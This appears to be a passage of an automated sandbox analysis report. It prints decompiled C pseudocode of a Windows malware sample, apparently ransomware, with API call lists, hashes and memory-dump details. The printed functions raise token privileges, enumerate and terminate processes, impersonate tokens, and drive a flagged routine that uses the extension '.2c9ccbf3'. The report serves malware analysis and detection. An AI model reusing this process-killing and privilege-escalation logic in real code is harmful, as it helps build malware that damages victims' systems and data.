					 *((intOrPtr*)(_t18 + 8)) = 0x5c006c;
					 *((intOrPtr*)(_t18 + 0xc)) = 0x730025;
					 *((intOrPtr*)(_t18 + 0x10)) = 0x25002d;
					 *((intOrPtr*)(_t18 + 0x14)) = 0x75;
					 *0x40f69c( &_v92,  &_v28, _a4, GetProcessId(0xffffffff));
					_t17 = OpenFileMappingW(0xf001f, 0,  &_v92);
					_t28 = _t17;
					if(_t28 != 0) {
						_t24 = MapViewOfFile(_t28, 0xf001f, 0, 0, 0x10);
						if(_t24 != 0) {
							_t29 =  *0x40f638; // 0x0
							 *_t24 = _t29;
							_t30 =  *0x40f644; // 0x0
							 *((intOrPtr*)(_t24 + 4)) = _t30;
							_t31 =  *0x40f63c; // 0x0
							 *((intOrPtr*)(_t24 + 8)) = _t31;
							_t32 =  *0x40f640; // 0x0
							 *((intOrPtr*)(_t24 + 0xc)) = _t32;
							UnmapViewOfFile(_t24);
						}
						return NtClose(_t28);
					}
				}
				return _t17;
			}













                                                                                        0x00408f61
                                                                                        0x00408f68
                                                                                        0x00408f74
                                                                                        0x00408f7b
                                                                                        0x00408f7b
                                                                                        0x00408f83
                                                                                        0x00408f8f
                                                                                        0x00408f95
                                                                                        0x00408f98
                                                                                        0x00408f9e
                                                                                        0x00408fa5
                                                                                        0x00408fac
                                                                                        0x00408fb3
                                                                                        0x00408fba
                                                                                        0x00408fd5
                                                                                        0x00408fe9
                                                                                        0x00408fef
                                                                                        0x00408ff3
                                                                                        0x00409001
                                                                                        0x00409009
                                                                                        0x0040900b
                                                                                        0x00409011
                                                                                        0x00409013
                                                                                        0x00409019
                                                                                        0x0040901c
                                                                                        0x00409022
                                                                                        0x00409025
                                                                                        0x0040902b
                                                                                        0x0040902f
                                                                                        0x0040902f
                                                                                        0x00000000
                                                                                        0x00409036
                                                                                        0x00408ff3
                                                                                        0x0040903f

                                                                                        APIs
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                          • Part of subcall function 004022D9: NtSetInformationProcess.NTDLL(000000FF,00000012,0040F94C,00000002), ref: 004022FB
                                                                                          • Part of subcall function 004022D9: NtSetInformationProcess.NTDLL(000000FF,00000021,0040F94C,00000004), ref: 00402313
                                                                                        • GetProcessId.KERNEL32(000000FF,004091A8,00000003), ref: 00408FC3
                                                                                        • _swprintf.NTDLL ref: 00408FD5
                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,?), ref: 00408FE9
                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000010), ref: 00409001
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040902F
                                                                                        • NtClose.NTDLL(00000000), ref: 00409036
                                                                                          • Part of subcall function 0040314C: _swprintf.NTDLL ref: 00403169
                                                                                          • Part of subcall function 0040314C: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040317B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InformationProcessToken$FileHeap$CloseFreeOpenQueryView_swprintf$AdjustAllocateMappingPrivilegesUnmap
                                                                                        • String ID:
                                                                                        • API String ID: 1024850670-0
                                                                                        • Opcode ID: 23b2a1f9fa450f91b3f18fdd9abcc66c2088ca41bfc71efe00d791b6fabff58a
                                                                                        • Instruction ID: f833de01ad95f0be796b816ea4045ca79d195bf543ba841e9b2867f781130cdd
                                                                                        • Opcode Fuzzy Hash: 23b2a1f9fa450f91b3f18fdd9abcc66c2088ca41bfc71efe00d791b6fabff58a
                                                                                        • Instruction Fuzzy Hash: 7F2162B0500304AFD7249F90DD4DF667BA8EB04304F05857ABA05BB6F2DBB99849CB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004048D8, Relevance: 7.6, APIs: 5, Instructions: 59nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E004048D8() {
				long _t28;
				void* _t41;
				intOrPtr* _t45;
				void _t51;
				void* _t53;

				while(1) {
					_t28 = NtQuerySystemInformation(5,  *(_t53 - 0xc),  *(_t53 - 8), _t53 - 8);
					if(_t28 == 0) {
						break;
					}
					if(_t28 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
					} else {
						 *(_t53 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t53 - 0xc),  *(_t53 - 8));
						continue;
					}
					L14:
				}
				_t41 =  *(_t53 - 0xc);
				do {
					_t51 =  *_t41;
					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
						 *(_t53 - 0x14) =  *((intOrPtr*)(_t41 + 0x44));
						 *(_t53 - 0x10) = 0;
						_t45 = _t53 - 0x2c;
						 *_t45 = 0x18;
						 *(_t45 + 4) = 0;
						 *(_t45 + 8) = 0;
						 *(_t45 + 0xc) = 0;
						 *(_t45 + 0x10) = 0;
						 *(_t45 + 0x14) = 0;
						if(NtOpenProcess(_t53 - 4, 1, _t53 - 0x2c, _t53 - 0x14) == 0) {
							 *0x40f708( *(_t53 - 4), 0);
							NtClose( *(_t53 - 4));
						}
					}
					_t41 = _t41 + _t51;
				} while (_t51 != 0);
				return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
				goto L14;
			}








                                                                                        0x0040489e
                                                                                        0x004048aa
                                                                                        0x004048b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f3
                                                                                        0x004048bf
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f6
                                                                                        0x004048f9
                                                                                        0x004048f9
                                                                                        0x004048ff
                                                                                        0x00404910
                                                                                        0x00404913
                                                                                        0x0040491a
                                                                                        0x0040491d
                                                                                        0x00404923
                                                                                        0x0040492a
                                                                                        0x00404931
                                                                                        0x00404938
                                                                                        0x0040493f
                                                                                        0x0040495c
                                                                                        0x00404963
                                                                                        0x0040496c
                                                                                        0x0040496c
                                                                                        0x0040495c
                                                                                        0x00404972
                                                                                        0x00404975
                                                                                        0x00404992
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: HeapProcess$AllocateCloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2245525756-0
                                                                                        • Opcode ID: f7330f94261fe563ac1d793c3aa95f7df7714d39316cd2ac302f6c325cd95a44
                                                                                        • Instruction ID: d4a44320e30960affac830221f84e6ffc493adab8b490f365440909e9bd9fb0f
                                                                                        • Opcode Fuzzy Hash: f7330f94261fe563ac1d793c3aa95f7df7714d39316cd2ac302f6c325cd95a44
                                                                                        • Instruction Fuzzy Hash: C821F1B6900208EFDB11DF90DD44B9E7BB4FF44304F6084B6DA00BA1A1D7769A46DF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004048B6, Relevance: 7.6, APIs: 5, Instructions: 59nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E004048B6() {
				long _t28;
				void* _t41;
				intOrPtr* _t45;
				void _t51;
				void* _t53;

				while(1) {
					_t28 = NtQuerySystemInformation(5,  *(_t53 - 0xc),  *(_t53 - 8), _t53 - 8);
					if(_t28 == 0) {
						break;
					}
					if(_t28 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
					} else {
						 *(_t53 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t53 - 0xc),  *(_t53 - 8));
						continue;
					}
					L14:
				}
				_t41 =  *(_t53 - 0xc);
				do {
					_t51 =  *_t41;
					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
						 *(_t53 - 0x14) =  *((intOrPtr*)(_t41 + 0x44));
						 *(_t53 - 0x10) = 0;
						_t45 = _t53 - 0x2c;
						 *_t45 = 0x18;
						 *(_t45 + 4) = 0;
						 *(_t45 + 8) = 0;
						 *(_t45 + 0xc) = 0;
						 *(_t45 + 0x10) = 0;
						 *(_t45 + 0x14) = 0;
						if(NtOpenProcess(_t53 - 4, 1, _t53 - 0x2c, _t53 - 0x14) == 0) {
							 *0x40f708( *(_t53 - 4), 0);
							NtClose( *(_t53 - 4));
						}
					}
					_t41 = _t41 + _t51;
				} while (_t51 != 0);
				return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
				goto L14;
			}








                                                                                        0x0040489e
                                                                                        0x004048aa
                                                                                        0x004048b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f3
                                                                                        0x004048bf
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f6
                                                                                        0x004048f9
                                                                                        0x004048f9
                                                                                        0x004048ff
                                                                                        0x00404910
                                                                                        0x00404913
                                                                                        0x0040491a
                                                                                        0x0040491d
                                                                                        0x00404923
                                                                                        0x0040492a
                                                                                        0x00404931
                                                                                        0x00404938
                                                                                        0x0040493f
                                                                                        0x0040495c
                                                                                        0x00404963
                                                                                        0x0040496c
                                                                                        0x0040496c
                                                                                        0x0040495c
                                                                                        0x00404972
                                                                                        0x00404975
                                                                                        0x00404992
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: HeapProcess$AllocateCloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2245525756-0
                                                                                        • Opcode ID: 502942dec87dcaec254f5c3f5d4315f0914e52bc62ba5990316bc4b51f652a24
                                                                                        • Instruction ID: d4a44320e30960affac830221f84e6ffc493adab8b490f365440909e9bd9fb0f
                                                                                        • Opcode Fuzzy Hash: 502942dec87dcaec254f5c3f5d4315f0914e52bc62ba5990316bc4b51f652a24
                                                                                        • Instruction Fuzzy Hash: C821F1B6900208EFDB11DF90DD44B9E7BB4FF44304F6084B6DA00BA1A1D7769A46DF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004072E0, Relevance: 7.6, APIs: 5, Instructions: 58threadnativesynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004072E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;

				_v12 = 0xffffffff;
				_v40 = _a4;
				_v36 = _a8;
				_v32 = _a12;
				_v28 = _a16;
				_v24 = _a20;
				_v20 = _a24;
				_v16 = _a28;
				_v8 = CreateThread(0, 0, E004072BC,  &_v40, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, _a32) != 0x102) {
						GetExitCodeThread(_v8,  &_v12);
					} else {
						NtTerminateThread(_v8, 0);
					}
					NtClose(_v8);
				}
				return _v12;
			}












                                                                                        0x004072eb
                                                                                        0x004072f5
                                                                                        0x004072fb
                                                                                        0x00407301
                                                                                        0x00407307
                                                                                        0x0040730d
                                                                                        0x00407313
                                                                                        0x00407319
                                                                                        0x00407333
                                                                                        0x0040733a
                                                                                        0x0040734d
                                                                                        0x00407363
                                                                                        0x0040734f
                                                                                        0x00407354
                                                                                        0x00407354
                                                                                        0x0040736c
                                                                                        0x0040736c
                                                                                        0x0040737d

                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004072BC,?,00000000,00000000), ref: 0040732D
                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00407342
                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 00407354
                                                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,00000000,?,?,00000000), ref: 00407363
                                                                                        • NtClose.NTDLL(00000000), ref: 0040736C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseCodeCreateExitObjectSingleTerminateWait
                                                                                        • String ID:
                                                                                        • API String ID: 1797438295-0
                                                                                        • Opcode ID: 58eed08faf011ad016aacd7da90d8244a556d259883a75fe71c1a1fa6221bee6
                                                                                        • Instruction ID: ac80e1e9025d49e88988315da79a34fbbaebbe944a3b394ef96d7550ed6dec19
                                                                                        • Opcode Fuzzy Hash: 58eed08faf011ad016aacd7da90d8244a556d259883a75fe71c1a1fa6221bee6
                                                                                        • Instruction Fuzzy Hash: 1D21BF75A04208AFDB10DF98DD45BEEBBB4EB08310F204176F914E2290D375AE549B65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004054E0, Relevance: 7.5, APIs: 5, Instructions: 48threadnativesynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004054E0(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				void _v20;

				_v12 = 0xffffffff;
				_v20 = _a4;
				_v16 = _a8;
				_v8 = CreateThread(0, 0, E004054BB,  &_v20, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0xfa) != 0x102) {
						GetExitCodeThread(_v8,  &_v12);
					} else {
						NtTerminateThread(_v8, 0);
					}
					NtClose(_v8);
				}
				return _v12;
			}







                                                                                        0x004054eb
                                                                                        0x004054f5
                                                                                        0x004054fb
                                                                                        0x00405515
                                                                                        0x0040551c
                                                                                        0x00405531
                                                                                        0x00405547
                                                                                        0x00405533
                                                                                        0x00405538
                                                                                        0x00405538
                                                                                        0x00405550
                                                                                        0x00405550
                                                                                        0x00405561

                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004054BB,?,00000000,00000000), ref: 0040550F
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FA,?,?,00000000), ref: 00405526
                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 00405538
                                                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,?,00000000), ref: 00405547
                                                                                        • NtClose.NTDLL(00000000), ref: 00405550
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseCodeCreateExitObjectSingleTerminateWait
                                                                                        • String ID:
                                                                                        • API String ID: 1797438295-0
                                                                                        • Opcode ID: 2a9cb9ff76254a5c6869bbfd06634bbf3f88277a162e436e1c3bffd0a084d49d
                                                                                        • Instruction ID: 54362d9fb5c9e0574f01021ebee95bafb627d955c36f9b033aed9caf6e27678e
                                                                                        • Opcode Fuzzy Hash: 2a9cb9ff76254a5c6869bbfd06634bbf3f88277a162e436e1c3bffd0a084d49d
                                                                                        • Instruction Fuzzy Hash: B1010971A40208FFEB20DF94DD4ABAEBB79EB04721F204176F910B62E0D7715A449A59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409042, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 91%
                                                                                        			E00409042(void* __fp0) {
				char _v8;
				long _v12;
				long _t6;
				void* _t23;

				_t23 = __fp0;
				 *0x40f6bc(0x80000001,  &_v8);
				_t6 = E00402160();
				if( *0x40f5a5 != 0) {
					E00408995();
					_t6 = GetTickCount();
					_v12 = _t6;
				}
				if( *0x40f597 != 0) {
					_t6 = E00403E86();
				}
				_t13 =  *0x40f596;
				if( *0x40f596 != 0) {
					_t6 = E004046B1(_t13);
				}
				if( *0x40f59f != 0) {
					_t6 = E004046E2();
				}
				if( *0x40f59e != 0) {
					_t6 = E00404878();
				}
				_t16 =  *0x40f5a2;
				if( *0x40f5a2 != 0) {
					_t6 = E004039E3(_t16, ".2c9ccbf3");
				}
				if( *0x40f593 != 0) {
					_t6 = E00406EB7();
				}
				if( *0x40f594 != 0) {
					_t6 = E00407784();
				}
				if( *0x40f5a1 != 0) {
					_t6 = E0040314C(0x40f610);
				}
				if( *0x40f5a0 != 0) {
					_t6 = E004033B9( *0x40f5ce);
				}
				if( *0x40f5a5 != 0) {
					return E00408A8E(_t23, GetTickCount() - _v12);
				}
				return _t6;
			}







                                                                                        0x00409042
                                                                                        0x00409051
                                                                                        0x00409057
                                                                                        0x00409063
                                                                                        0x00409065
                                                                                        0x0040906a
                                                                                        0x00409070
                                                                                        0x00409070
                                                                                        0x0040907a
                                                                                        0x0040907c
                                                                                        0x0040907c
                                                                                        0x00409081
                                                                                        0x00409088
                                                                                        0x0040908a
                                                                                        0x0040908a
                                                                                        0x00409096
                                                                                        0x00409098
                                                                                        0x00409098
                                                                                        0x004090a4
                                                                                        0x004090a6
                                                                                        0x004090a6
                                                                                        0x004090ab
                                                                                        0x004090b2
                                                                                        0x004090b9
                                                                                        0x004090b9
                                                                                        0x004090c5
                                                                                        0x004090c7
                                                                                        0x004090c7
                                                                                        0x004090d3
                                                                                        0x004090d5
                                                                                        0x004090d5
                                                                                        0x004090e1
                                                                                        0x004090e8
                                                                                        0x004090e8
                                                                                        0x004090f4
                                                                                        0x004090fc
                                                                                        0x004090fc
                                                                                        0x00409108
                                                                                        0x00000000
                                                                                        0x00409114
                                                                                        0x0040911c

                                                                                        APIs
                                                                                        • NtSetThreadExecutionState.NTDLL(80000001,00409336), ref: 00409051
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        • GetTickCount.KERNEL32 ref: 0040910A
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089D5
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089E1
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089EF
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089FF
                                                                                          • Part of subcall function 00408995: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408A13
                                                                                          • Part of subcall function 00408995: sprintf.NTDLL ref: 00408A31
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408A4E
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000,0040C004), ref: 00408A5F
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408A6E
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,?), ref: 00408A7F
                                                                                        • GetTickCount.KERNEL32 ref: 0040906A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Tokenstrlen$AllocateCountInformationQueryTick$AdjustCloseExecutionOpenPrivilegesProcessStateThreadsprintf
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 2596900045-3269262987
                                                                                        • Opcode ID: ab62d4ac0d1b5524308dd87d599f83c5a19adebb95daa45a5da53e39ac05f46f
                                                                                        • Instruction ID: 9accfe5e45c5b31474c2340133867f7ef8fcb3675aee7ec44679ca29e4112870
                                                                                        • Opcode Fuzzy Hash: ab62d4ac0d1b5524308dd87d599f83c5a19adebb95daa45a5da53e39ac05f46f
                                                                                        • Instruction Fuzzy Hash: 961151A080828079FB36BBB5AE0E79A3E845705308F08057FA544719F3DA7D099CC75F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401AE1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 20%
                                                                                        			E00401AE1(char _a4) {
				void _v8;
				char _v32;
				intOrPtr* _t12;
				void* _t20;

				_t20 = 0;
				_t12 =  &_v32;
				 *_t12 = 0x18;
				 *((intOrPtr*)(_t12 + 4)) = 0;
				 *((intOrPtr*)(_t12 + 8)) = 0;
				 *((intOrPtr*)(_t12 + 0xc)) = 0;
				 *((intOrPtr*)(_t12 + 0x10)) = 0;
				 *((intOrPtr*)(_t12 + 0x14)) = 0;
				_push( &_v8);
				_push(2);
				_push(0);
				_push( &_v32);
				_push(0xc);
				_t9 =  &_a4; // 0x4071ef
				_push( *_t9);
				if( *0x40f6b4() == 0) {
					if(NtSetInformationThread(0xfffffffe, 5,  &_v8, 4) == 0) {
						_t20 = 1;
					}
					NtClose(_v8);
				}
				return _t20;
			}







                                                                                        0x00401aec
                                                                                        0x00401aee
                                                                                        0x00401af1
                                                                                        0x00401af7
                                                                                        0x00401afe
                                                                                        0x00401b05
                                                                                        0x00401b0c
                                                                                        0x00401b13
                                                                                        0x00401b1d
                                                                                        0x00401b1e
                                                                                        0x00401b20
                                                                                        0x00401b25
                                                                                        0x00401b26
                                                                                        0x00401b28
                                                                                        0x00401b28
                                                                                        0x00401b33
                                                                                        0x00401b47
                                                                                        0x00401b49
                                                                                        0x00401b49
                                                                                        0x00401b4d
                                                                                        0x00401b4d
                                                                                        0x00401b5d

                                                                                        APIs
                                                                                        • NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                        • NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                        • NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseDuplicateInformationThreadToken
                                                                                        • String ID: q@
                                                                                        • API String ID: 1566617950-2764676539
                                                                                        • Opcode ID: eba7002e426f32c7822c45e36ded9257523e95c4d91753086f36417129bd1fd2
                                                                                        • Instruction ID: 5e5483981f39e58ef949d31c92621efebf9b249b1a87a9bb698d64c50a883e61
                                                                                        • Opcode Fuzzy Hash: eba7002e426f32c7822c45e36ded9257523e95c4d91753086f36417129bd1fd2
                                                                                        • Instruction Fuzzy Hash: 050125B1600208AFF7108F55DD49FABBBBCFB40714F108175E615DB1E1E77599088BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402003, Relevance: 6.1, APIs: 4, Instructions: 60memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 26%
                                                                                        			E00402003(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				void* _t24;
				void* _t26;
				void* _t27;

				_v8 = 0;
				 *0x40f6d0(_a4, 2,  &_v16, 4,  &_v12);
				_v16 = RtlAllocateHeap( *0x40f5d6, 8, _v12);
				if(_v16 != 0) {
					_t24 =  *0x40f6d0(_a4, 2, _v16, _v12,  &_v12);
					if(_t24 == 0) {
						_t27 = _v16;
						asm("lodsd");
						_t26 = _t24;
						while(1) {
							asm("lodsd");
							if( *((intOrPtr*)(_t24 + 8)) == 0x15 &&  *((intOrPtr*)(_t24 + 0x18)) == 0x200) {
								break;
							}
							_t27 = _t27 + 4;
							_t26 = _t26 - 1;
							if(_t26 != 0) {
								continue;
							}
							goto L7;
						}
						_v8 = 1;
					}
					L7:
					RtlFreeHeap( *0x40f5d6, 0, _v16);
				}
				return _v8;
			}









                                                                                        0x0040200e
